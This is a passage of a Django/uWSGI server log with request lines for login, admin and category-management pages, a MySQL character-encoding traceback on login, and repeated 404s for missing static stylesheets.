11057|app: 0|req: 869/1140] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:48:36 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 870/1141] 180.160.72.163 () {40 vars in 912 bytes} [Thu Jan 14 08:48:36 2021] GET /home/ => generated 7870 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 871/1142] 180.160.72.163 () {38 vars in 864 bytes} [Thu Jan 14 08:48:48 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\x93\\x88\\xE5\\x93\\x88' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\x93\\x88\\xE5\\x93\\x88' for column 'uid' at row 1") +[pid: 11057|app: 0|req: 872/1143] 180.160.72.163 () {48 vars in 1008 bytes} [Thu Jan 14 08:48:58 2021] POST /login/ => generated 209865 bytes in 165 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 873/1144] 180.160.72.163 () {40 vars in 920 bytes} [Thu Jan 14 08:49:37 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 11057|app: 0|req: 874/1145] 180.160.72.163 () {38 vars in 807 bytes} [Thu Jan 14 08:49:37 2021] GET /favicon.ico => generated 3480 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 875/1146] 180.160.72.163 () {48 vars in 1017 bytes} [Thu Jan 14 08:49:42 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 876/1147] 180.160.72.163 () {40 vars in 927 bytes} [Thu Jan 14 08:49:42 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: -1|req: -1/1148] 180.160.72.163 () {40 vars in 927 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1149] 180.160.72.163 () {40 vars in 873 bytes} [Thu Jan 14 08:49:42 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1150] 180.160.72.163 () {40 vars in 861 bytes} [Thu Jan 14 08:49:42 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1151] 180.160.72.163 () {40 vars in 890 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1152] 180.160.72.163 () {40 vars in 902 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1153] 180.160.72.163 () {40 vars in 908 bytes} [Thu Jan 14 08:49:42 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1154] 180.160.72.163 () {40 vars in 866 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1155] 180.160.72.163 () {40 vars in 842 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1156] 180.160.72.163 () {40 vars in 854 bytes} [Thu Jan 14 08:49:42 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1157] 180.160.72.163 () {40 vars in 930 bytes} [Thu Jan 14 08:49:43 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 877/1158] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 878/1159] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 879/1160] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 880/1161] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 881/1162] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 882/1163] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 883/1164] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:43 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 884/1165] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:43 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 885/1166] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:43 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1167] 180.160.72.163 () {40 vars in 852 bytes} [Thu Jan 14 08:49:43 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1168] 180.160.72.163 () {40 vars in 926 bytes} [Thu Jan 14 08:49:43 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 886/1169] 180.160.72.163 () {40 vars in 931 bytes} [Thu Jan 14 08:49:45 2021] GET /kind-manage/ => generated 8283 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 887/1170] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 888/1171] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 889/1172] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 890/1173] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 891/1174] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 892/1175] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 893/1176] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 894/1177] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:45 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 895/1178] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 896/1179] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:48 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 897/1180] 180.160.72.163 () {40 vars in 932 bytes} [Thu Jan 14 08:49:48 2021] GET /kind-manage/ => generated 7353 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 898/1181] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 899/1182] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 900/1183] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 901/1184] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 902/1185] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 903/1186] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 904/1187] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 905/1188] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 906/1189] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:48 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 907/1190] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:50 2021] POST /kind-manage/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 908/1191] 180.160.72.163 () {40 vars in 932 bytes} [Thu Jan 14 08:49:50 2021] GET /kind-manage/ => generated 6423 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 909/1192] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 910/1193] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 911/1194] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 912/1195] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 913/1196] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 914/1197] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 915/1198] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 916/1199] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 917/1200] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 919/1201] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:49:57 2021] GET /kind-manage/? => generated 6423 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 919/1202] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:49:57 2021] POST /kind-manage/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 920/1203] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 921/1204] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 922/1205] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 923/1206] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 924/1207] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 925/1208] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 926/1209] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:49:57 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 927/1210] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:49:57 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 928/1211] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:49:57 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 929/1212] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:01 2021] GET /kind-manage/ => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 930/1213] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 931/1214] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 932/1215] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 933/1216] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 934/1217] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 935/1218] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 936/1219] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 